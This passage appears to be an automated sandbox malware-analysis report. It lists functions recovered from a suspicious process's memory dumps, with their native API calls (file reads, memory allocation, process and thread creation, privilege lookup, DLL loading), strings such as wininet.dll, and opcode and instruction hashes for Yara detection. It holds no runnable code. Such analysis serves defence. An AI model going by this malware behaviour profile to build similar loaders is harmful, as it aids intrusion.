Download Yara Rule

APIs

NtReadFile.NTDLL(02D33D72,5E972F65,FFFFFFFF,02D33A31,?,?,02D33D72,?,02D33A31,FFFFFFFF,5E972F65,02D33D72,?,00000000), ref: 02D386D5

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 02931f39f765a68f84f8846b7d5469e27a3f3eb0b41d6bae6829940c113d2746
Instruction ID: df940ced36309bd889cfbe13ba4e011d822d54e263e7b805611b27163b22932a
Opcode Fuzzy Hash: 02931f39f765a68f84f8846b7d5469e27a3f3eb0b41d6bae6829940c113d2746
Instruction Fuzzy Hash: A2F0E7B2210108AFCB04DF88DC84EEB77A9EF8C354F158248BA0D97241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D38690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D33D72,5E972F65,FFFFFFFF,02D33A31,?,?,02D33D72,?,02D33A31,FFFFFFFF,5E972F65,02D33D72,?,00000000), ref: 02D386D5

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: a153b96d610da14e8089922d19a6939071930ad981a21a435e327f6ddcf124eb
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: AFF0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1DA7241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D387C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D22D11,00002000,00003000,00000004), ref: 02D387F9

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 58997b33ddac89b4e3e17494e4cf9fbb7af437622744a1e119b993564a75651c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 63F015B2200208ABCB14DF89CC80EEB77ADEF88750F158148FE08A7241C630F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3870A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D33D50,?,?,02D33D50,00000000,FFFFFFFF), ref: 02D38735

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8fad9e3a3922db2f1d6f8ff836ef27d0565396ec58023794657d92c5d8b8e924
Instruction ID: 144e26a4dad8903b9586c1279b885ec742916b9ea8764c4d7ab0e98fe180e1d7
Opcode Fuzzy Hash: 8fad9e3a3922db2f1d6f8ff836ef27d0565396ec58023794657d92c5d8b8e924
Instruction Fuzzy Hash: 80E01275641114ABDB10EF94CC88ED77F69EF45350F158495F9595B241C530E600CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D38710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D33D50,?,?,02D33D50,00000000,FFFFFFFF), ref: 02D38735

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 3d6d72c7ab4c1346ba2593d6b1b4032cb19299a321ca0c6292e69146b4bdf609
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BBD01776600214ABD710EB98CC89EE77BADEF48760F154499BA18AB242C570FA00CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 04719540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471954A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd22aab66020623aaab7831ab886d2e296e66ff76541c6f29060557a1ac6763d
Instruction ID: 77cf8b9f2bde1a4b4bb9705b183e88ad6fdb000bd9ae6bd6c2a1793ecbb103f4
Opcode Fuzzy Hash: cd22aab66020623aaab7831ab886d2e296e66ff76541c6f29060557a1ac6763d
Instruction Fuzzy Hash: B5900265211050072115A5590704507004697D93A5361C031F5006560CD661D8A57161

Uniqueness

Uniqueness Score: -1.00%

Function 047195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047195DA

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96f7c8c2a130686eee0bc99aa902752b32f16cce703b76e280753d62267a0444
Instruction ID: 8dd7d675d1c84582a842e46f569eb9a043c43462469eab3748a6ce2946c25d4a
Opcode Fuzzy Hash: 96f7c8c2a130686eee0bc99aa902752b32f16cce703b76e280753d62267a0444
Instruction Fuzzy Hash: 659002A120205007611571594514616400A97E4255B61C031E50055A0DC565D8D57165

Uniqueness

Uniqueness Score: -1.00%

Function 04719660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471966A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d668f6a6e26991a2757c2d817be9ccb581329da73e4c73bd21636a576fae6d7
Instruction ID: fa826d2adb4ee4d93331d4991d44a00f0b4cd23373d889d8e7bd26abf0e11119
Opcode Fuzzy Hash: 4d668f6a6e26991a2757c2d817be9ccb581329da73e4c73bd21636a576fae6d7
Instruction Fuzzy Hash: A190027120105806F1907159450464A000597D5355FA1C025A4016664DCA55DA9D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04719650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471965A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9add4fe950438bb8e269f795f8e006676f7a14a389594ad77b321581dd2e6330
Instruction ID: e292f1a18e2d2d12bb571c8c86cd967d0c37e5f2407db67b45d01fead2e16e2a
Opcode Fuzzy Hash: 9add4fe950438bb8e269f795f8e006676f7a14a389594ad77b321581dd2e6330
Instruction Fuzzy Hash: 8690027120509846F15071594504A46001597D4359F61C021A40556A4D9665DD99B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 047196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047196EA

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1049566489cda34f45d3d40b0a7ba275a0b92fd6874a48b66a94813d6a84097
Instruction ID: a4eee0f603aa90ec1cc37c08a470cd10bc6dcd08d40d88d823ce172c9f30874b
Opcode Fuzzy Hash: f1049566489cda34f45d3d40b0a7ba275a0b92fd6874a48b66a94813d6a84097
Instruction Fuzzy Hash: 449002712010D806F1206159850474A000597D4355F65C421A8415668D86D5D8D57161

Uniqueness

Uniqueness Score: -1.00%

Function 047196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047196DA

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1178d891af2b1d5f45ceb56eff7463423831f03ceb144ff9bcef034dbeac8e20
Instruction ID: fa625384da7359a5ef4a4ff4ebb9c4153b7a845ab6f05e37c876c37eeb26983c
Opcode Fuzzy Hash: 1178d891af2b1d5f45ceb56eff7463423831f03ceb144ff9bcef034dbeac8e20
Instruction Fuzzy Hash: 6690027120105846F11061594504B46000597E4355F61C026A4115664D8655D8957561

Uniqueness

Uniqueness Score: -1.00%

Function 04719710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471971A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc67fb0d09649418421c1e127bf81424ada73cf644541d049458f7d583419381
Instruction ID: 74aef1b5ede9476f00e7b2f864015d7ac8bf6a06753b5948e42f5d8d59d7c0b1
Opcode Fuzzy Hash: dc67fb0d09649418421c1e127bf81424ada73cf644541d049458f7d583419381
Instruction Fuzzy Hash: 1790027120105406F11065995508646000597E4355F61D021A9015565EC6A5D8D57171

Uniqueness

Uniqueness Score: -1.00%

Function 04719FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04719FEA

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f34c3633126d43d0b4899bfb88d0ead10425d7687e470fc8ea6feb4031958b5
Instruction ID: 74676c74596f50d5b11ddfe1a567ca97504611f2c16d18e7d245c474acde6952
Opcode Fuzzy Hash: 7f34c3633126d43d0b4899bfb88d0ead10425d7687e470fc8ea6feb4031958b5
Instruction Fuzzy Hash: 5D90027131119406F12061598504706000597D5255F61C421A4815568D86D5D8D57162

Uniqueness

Uniqueness Score: -1.00%

Function 04719780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471978A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f6f5f0c324508d9a4b8bce4ef3a1848ab965523a2983cb5b8d9ad438efba5a7
Instruction ID: cceb0c1ac7421697cceeebcbcd94ebdbeff406ea22d91e9b89c59bf07c5e146f
Opcode Fuzzy Hash: 5f6f5f0c324508d9a4b8bce4ef3a1848ab965523a2983cb5b8d9ad438efba5a7
Instruction Fuzzy Hash: 0B90026921305006F1907159550860A000597D5256FA1D425A4006568CC955D8AD7361

Uniqueness

Uniqueness Score: -1.00%

Function 04719860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471986A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4b185c2466264ff0e698cb78bda864d80bcbd3102daf244c981ee626b6d696d
Instruction ID: 3055b95da0ff46c908416ef27a16e537e77a3d26c5fa32c8e8a2d499afb68bc7
Opcode Fuzzy Hash: a4b185c2466264ff0e698cb78bda864d80bcbd3102daf244c981ee626b6d696d
Instruction Fuzzy Hash: BB90027120105417F12161594604707000997D4295FA1C422A4415568D9696D996B161

Uniqueness

Uniqueness Score: -1.00%

Function 04719840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471984A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1590abd6816ede21991b8c8d59e0ad20a47dc89c3b2b9d40624243489cf4673f
Instruction ID: 8f56c4cae11b4be01b028e72d400b527d41f91d5c649f111b127ce8bece0067f
Opcode Fuzzy Hash: 1590abd6816ede21991b8c8d59e0ad20a47dc89c3b2b9d40624243489cf4673f
Instruction Fuzzy Hash: 82900261242091567555B15945045074006A7E42957A1C022A5405960C8566E89AF661

Uniqueness

Uniqueness Score: -1.00%

Function 04719910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0471991A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d810d8cd8af3af9a83b15f7ae779d76a868b90c797dd73fbd9e9f7fc1388a646
Instruction ID: 194a6548efb7be8860dc73ec24961ec1ac968c51ccc88aedec786057f18bf4a9
Opcode Fuzzy Hash: d810d8cd8af3af9a83b15f7ae779d76a868b90c797dd73fbd9e9f7fc1388a646
Instruction Fuzzy Hash: 9E9002B120105406F15071594504746000597D4355F61C021A9055564E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 047199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047199AA

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d36dfcd230132335583c0f8427da89910d309a11f7c72f1c4444bab37ea7450
Instruction ID: 49e7c93eecddbbf4ecac264f55a120287c687f9863fc3116fb9c68e1dcb62696
Opcode Fuzzy Hash: 6d36dfcd230132335583c0f8427da89910d309a11f7c72f1c4444bab37ea7450
Instruction Fuzzy Hash: 6B9002A134105446F11061594514B060005D7E5355F61C025E5055564D8659DC967166

Uniqueness

Uniqueness Score: -1.00%

Function 04719A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04719A5A

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e4325bd681e4e96a26a8f599c9210df76e7c6a2a2bebaeae792aca5e77644f1
Instruction ID: b1343588e64e7cb2dd4b81d364d1d813ab2f347dc322c7b1a62c2979b6eb4198
Opcode Fuzzy Hash: 7e4325bd681e4e96a26a8f599c9210df76e7c6a2a2bebaeae792aca5e77644f1
Instruction Fuzzy Hash: 7F90026121185046F21065694D14B07000597D4357F61C125A4145564CC955D8A57561

Uniqueness

Uniqueness Score: -1.00%

Function 02D37300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D373A8

Strings

net.dll, xrefs: 02D37371, 02D373F7, 02D373CF, 02D373DB, 02D37403
wininet.dll, xrefs: 02D3735E, 02D37367

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 97ac5c4296dea38e5ec4cca848477421bd94242178af339f258414473574c63e
Instruction ID: 12fc7ffd460e05ae1c619fd30979d25b3b8f1e7976a9be0b49415ab35f132d12
Opcode Fuzzy Hash: 97ac5c4296dea38e5ec4cca848477421bd94242178af339f258414473574c63e
Instruction Fuzzy Hash: 8E318CB6601604ABD712EF64C8A0FABB7B9EF88700F10811DFA599B241D730B845CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D372F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D373A8

Strings

net.dll, xrefs: 02D37371, 02D373CF, 02D373DB
wininet.dll, xrefs: 02D3735E, 02D37367

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: fbbdf24a2758439cf0102f8d35f6aa947e7666872911b1b14222693cdc0b2449
Instruction ID: c2b5249fc5d37574b679b19feb96c55e7ad1230368d1080e42e4c6878636f4ff
Opcode Fuzzy Hash: fbbdf24a2758439cf0102f8d35f6aa947e7666872911b1b14222693cdc0b2449
Instruction Fuzzy Hash: 2931A0B1A01604ABD712DF64C8A1FABFBB5EF88700F10811DFA995B341D770A845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D388F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D23B93), ref: 02D3891D

Strings

.z`, xrefs: 02D3890C, 02D38918

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 14b211ae1c2b47cf7445edf2c8788b187b6037481a15db46822d0b637e4c507a
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 9DE012B1200208ABDB18EF99CC48EA777ADEF88750F018558FA086B241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D27280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D272DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D272FB

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction ID: c8d23f8c388f9d31f59e5e634e89a37e1ad989543caeea8fea4d26c77351eb21
Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction Fuzzy Hash: 9401F731A8022977E721A6949C02FFE776C9F00B55F144114FF04BA2C0EA946D0986F6

Uniqueness

Uniqueness Score: -1.00%

Function 02D29B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D29BB2

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 1e8df70a142a454abcecb5a33941f93ff23232793f01353e278b8ea279d1e7ad
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: F5011EB5E0020DBBDF10DAA4DC91FDEB3799F54308F1041A5A90897285F671EB18CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D3895D, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389B4

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: d4ce1967747a09508e7191c5298f6fb07051d5400819f16cf067a646978cbe51
Instruction ID: c7ee7de7aff94398388db42b903ed32337251474ef58c800ca7d5bbbed5f5d84
Opcode Fuzzy Hash: d4ce1967747a09508e7191c5298f6fb07051d5400819f16cf067a646978cbe51
Instruction Fuzzy Hash: 2101AFB2214108AFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D38960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D389B4

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 579b93734062f0c5ab00fc09e535bb21c33ac4a0482273c911a13223f021aa8e
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 5A01AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D37430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCF0,?,?), ref: 02D3746C

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
Instruction ID: 855c5e4d493355aa01c76f0583540efb325b41df06632da49ab7ce8c8e8c70ea
Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
Instruction Fuzzy Hash: 6BE09A733803043AE33165A9EC02FA7B39DCB81B35F54002AFA4DEB2C0D995F80146E8

Uniqueness

Uniqueness Score: -1.00%

Function 02D37423, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D2CCF0,?,?), ref: 02D3746C

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a4e14181658a395a5577eaeaa06573f26b4fd23e46534c581905f40304a52b7
Instruction ID: 93f58b20c002deda30074f3c1a4d273437000ea611e39ccc1531f5a51b6f8a98
Opcode Fuzzy Hash: 9a4e14181658a395a5577eaeaa06573f26b4fd23e46534c581905f40304a52b7
Instruction Fuzzy Hash: 30F0EC723407007FD3216AACCD41FA7B7A9DF51B14F550169F649AB2C1DAE4B90187A4

Uniqueness

Uniqueness Score: -1.00%

Function 02D38A41, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D2CFC2,02D2CFC2,?,00000000,?,?), ref: 02D38A80

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bc6ab82ebf9c924244c462c6bb11f9bc2834f8e14d89f1d8e235d30e0e180293
Instruction ID: 7a19e92def5b5a023e41c8fa2b11a4bfd00ddf5e7e2b92b9f0aeeb494da51a2d
Opcode Fuzzy Hash: bc6ab82ebf9c924244c462c6bb11f9bc2834f8e14d89f1d8e235d30e0e180293
Instruction Fuzzy Hash: 76F039B66042146FCB22DF44CC95EEB3B69AF8A660F058195FA086B352C534AE05CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D38A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D2CFC2,02D2CFC2,?,00000000,?,?), ref: 02D38A80

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 3f3ef8f0b2e1b0e19793d7ead5c5f72c4906fe3a675011b44a09f85555ef8602
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 37E01AB16002086BDB10DF49CC84EE737ADEF88650F018154FA0867241C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D388B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D33536,?,02D33CAF,02D33CAF,?,02D33536,?,?,?,?,?,00000000,00000000,?), ref: 02D388DD

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 74d277d6a92c66b946d2ec094ad9faeb1e26f65c9fbba86f277bc48b33f3b2c7
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 5BE012B1200208ABDB14EF99CC44EA777ADEF88650F158558FA086B241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

